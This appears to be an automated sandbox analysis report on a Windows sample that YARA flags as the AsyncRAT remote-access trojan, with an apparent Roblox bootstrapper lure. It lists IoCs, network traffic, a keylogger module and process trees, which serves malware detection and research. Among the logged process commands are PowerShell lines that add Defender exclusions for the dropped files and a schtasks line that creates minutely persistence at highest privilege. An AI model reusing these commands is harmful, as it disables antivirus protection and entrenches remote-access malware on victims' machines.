                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfSt
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                          Source: svchost.exe, 0000000E.00000003.1560487020.0000029107563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560378922.000002910753B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfToken
                          Source: svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBB0000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBAC000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBB4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                          Source: powershell.exe, 00000005.00000002.1471543702.000001A99745F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1603906589.000001D5E175F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1799985750.000001D210070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2049620309.000001B8738DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBA41000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://pastebin.com/raw/pjseRvyK
                          Source: svchost.exe, 0000000E.00000003.1560434401.0000029107540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2614010302.0000029106C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                          Source: BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://www.newtonsoft.com/jsonschema
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nodejs.org
                          Source: BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000000.1364148656.0000022EC9D72000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.23_ModdedByHisako.exe, 00000003.00000002.1690390446.0000022ECBBD6000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                          Source: BootstrapperV1.23_ModdedByHisako.exe.0.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                          Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49706 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49709 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 128.116.119.3:443 -> 192.168.2.8:49710 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.8:49711 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED
Source: not rat.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, XLogger.cs | .Net Code: KeyboardLayout
Source: svchost.exe.2.dr, XLogger.cs | .Net Code: KeyboardLayout

Operating System Destruction

Source: C:\Users\user\AppData\Roaming\not rat.exe | Process information set: 01 00 00 00

System Summary

Source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\not rat.exe | Code function: 2_2_00007FFB4B0F5C76
Source: C:\Users\user\AppData\Roaming\not rat.exe | Code function: 2_2_00007FFB4B0F1F41
Source: C:\Users\user\AppData\Roaming\not rat.exe | Code function: 2_2_00007FFB4B0F6A22
Source: C:\Users\user\AppData\Roaming\not rat.exe | Code function: 2_2_00007FFB4B0F155E
Source: C:\Users\user\AppData\Roaming\not rat.exe | Code function: 2_2_00007FFB4B0F1CA1
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Code function: 3_2_00007FFB4B0F2BAA
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Code function: 3_2_00007FFB4B0E7120
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Code function: 3_2_00007FFB4B0E7000
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Code function: 3_2_00007FFB4B0F6EC0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFB4B0C9F65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFB4B0C108C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFB4B0CAB15
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFB4B0DB810
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFB4B0D9EFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFB4B1A30E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFB4B0F0FA8
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 25_2_00007FFB4B0F1CA1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 25_2_00007FFB4B0F155E
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 26_2_00007FFB4B0D1CA1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 26_2_00007FFB4B0D155E
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFB4B0E1CA1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFB4B0E155E
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 29_2_00007FFB4B0F155E
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424
Source: BootstrapperV1.23_ModdedByHisako.exe.0.dr | Static PE information: No import functions for PE file found
Source: sDKRz09zM7.exe, 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamenot rat.exe4 vs sDKRz09zM7.exe
Source: sDKRz09zM7.exe, 00000000.00000000.1356765342.0000000000D22000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSOLARAT.exe4 vs sDKRz09zM7.exe
Source: sDKRz09zM7.exe | Binary or memory string: OriginalFilenameSOLARAT.exe4 vs sDKRz09zM7.exe
Source: sDKRz09zM7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: sDKRz09zM7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sDKRz09zM7.exe, Program.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: not rat.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: not rat.exe.0.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: not rat.exe.0.dr, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.2.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe.2.dr, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: svchost.exe.2.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: svchost.exe.2.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: not rat.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: not rat.exe.0.dr, ClientSocket.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@32/33@6/6
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | File created: C:\Users\user\AppData\Roaming\not rat.exe
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | Mutant created: \Sessions\1\BaseNamedObjects\m6Bfa5J2gE4aLnIam
Source: C:\Users\user\AppData\Roaming\svchost.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3456:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Users\user\AppData\Roaming\not rat.exe | Mutant created: \Sessions\1\BaseNamedObjects\GP0Tp1OoKfqkeZmS
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7424
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Users\user\AppData\Roaming\not rat.exe | File created: C:\Users\user\AppData\Local\Temp\Log.tmp
Source: sDKRz09zM7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sDKRz09zM7.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: sDKRz09zM7.exe | ReversingLabs: Detection: 65%
Source: unknown | Process created: C:\Users\user\Desktop\sDKRz09zM7.exe "C:\Users\user\Desktop\sDKRz09zM7.exe"
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | Process created: C:\Users\user\AppData\Roaming\not rat.exe "C:\Users\user\AppData\Roaming\not rat.exe"
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | Process created: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe "C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe"
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'not rat.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424
Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 2180
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | Process created: C:\Users\user\AppData\Roaming\not rat.exe "C:\Users\user\AppData\Roaming\not rat.exe"
Source: C:\Users\user\Desktop\sDKRz09zM7.exe | Process created: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe "C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe"
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'not rat.exe'
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\not rat.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 2180
Source: C:\Windows\System32\WerFault.exe | Process created: unknown unknown
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: rsaenh.dllJump to behavior
